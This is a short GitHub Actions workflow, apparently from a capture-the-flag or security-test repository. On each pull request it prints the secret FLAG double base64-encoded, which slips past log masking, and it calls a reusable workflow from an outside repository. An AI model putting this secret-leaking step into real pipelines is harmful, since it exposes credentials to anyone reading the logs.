name: pull request
on:
  pull_request:

jobs:
  a:
    runs-on: ubuntu-latest
    steps:
      - run: echo ${{ secrets.FLAG }} | base64 | base64

  b:
    uses: QuebecBashing/workflow_run/.github/workflows/test_workflow_call.yml@main
